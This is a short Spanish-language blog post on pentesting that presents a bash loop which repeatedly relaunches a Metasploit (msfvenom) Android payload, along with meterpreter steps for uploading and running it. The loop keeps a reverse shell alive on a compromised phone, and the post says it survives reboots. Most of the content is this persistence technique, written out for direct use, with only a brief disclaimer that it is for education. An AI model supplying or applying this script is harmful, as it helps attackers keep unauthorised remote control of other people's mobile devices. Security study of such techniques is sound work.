Android - Persistencia en sistemas móviles (reverse shell)
Cuando se realiza un Pentest, una de las cosas que nos atañen es el mantener la persistencia en los sistemas vulnerados y mucho más si estos son móviles.
14 August 2019
DISCLAIMER: El contenido de este artículo tiene como propósito compartir información para fines educativos. No me hago responsable de cualquier acto ilícito realizado con la información siguiente. No vulneres sistemas ajenos a los tuyos. El conocimiento es libre.
Cuando se realiza un Pentest, una de las cosas que nos atañen es el mantener la persistencia en los sistemas vulnerados y mucho más si estos son móviles.
Es por ello que hoy veremos un pequeño script ".sh" que nos permitirá mantener conexión con el dispositivo remoto, y que exista una persistencia (reverse shell).
Una vez vulnerada una terminal de Android, lo único que queda es correr un archivo en BASH que mande llamar de manera recursiva a la aplicación maliciosa. Se toma como ejemplo una shell creada con msfvenom (de Metasploit).
El script:
while true:
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 15
done
Hay que movernos con la shell interna del sistema vulnerado hasta la ruta:
/data/data/com.metasploit.stage/files
Para luego proceder a subir la recursividad (comando upload desde meterpreter) y correrla con el comando:
sh recur.sh
La recursividad funciona aún con el reinicio del sistema.
Exploiting vulnerabilities, creating new ways through